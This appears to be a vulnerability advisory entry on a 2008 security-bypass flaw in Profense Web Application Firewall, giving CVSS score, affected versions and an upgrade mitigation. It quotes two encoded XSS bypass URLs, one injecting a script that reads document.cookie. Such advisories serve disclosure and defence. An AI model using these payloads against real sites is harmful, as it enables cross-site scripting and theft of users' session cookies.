vendor:
Profense Web Application Firewall
by:
SecurityFocus
4.3
CVSS
MEDIUM
Security-Bypass
287
CWE
Product Name: Profense Web Application Firewall
Affected Version From: Prior to Profense 2.4.4 and Profense 2.2.22
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Profense Web Application Firewall Multiple Security-Bypass Vulnerabilities
An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks. Attackers can use malicious URLs such as http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass and http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E to bypass security restrictions.
Mitigation:
Upgrade to Profense 2.4.4 or Profense 2.2.22 or later.